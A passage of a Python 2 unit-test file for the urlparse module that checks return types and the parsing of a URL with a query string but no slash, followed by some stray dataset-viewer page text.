p = urlparse.urlparse(uri)
self.assertEqual(type(p.scheme), type(uri))
self.assertEqual(type(p.hostname), type(uri))
self.assertEqual(type(p.path), type(uri))
def test_noslash(self):
# Issue 1637: http://foo.com?query is legal
self.assertEqual(urlparse.urlparse("http://example.com?blahblah=/foo"),
('http', 'example.com', '', '', 'blahblah=/foo', ''))
def test_main():
test_support.run_unittest(UrlParseTestCase)
if __name__ == "__main__":
test_main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.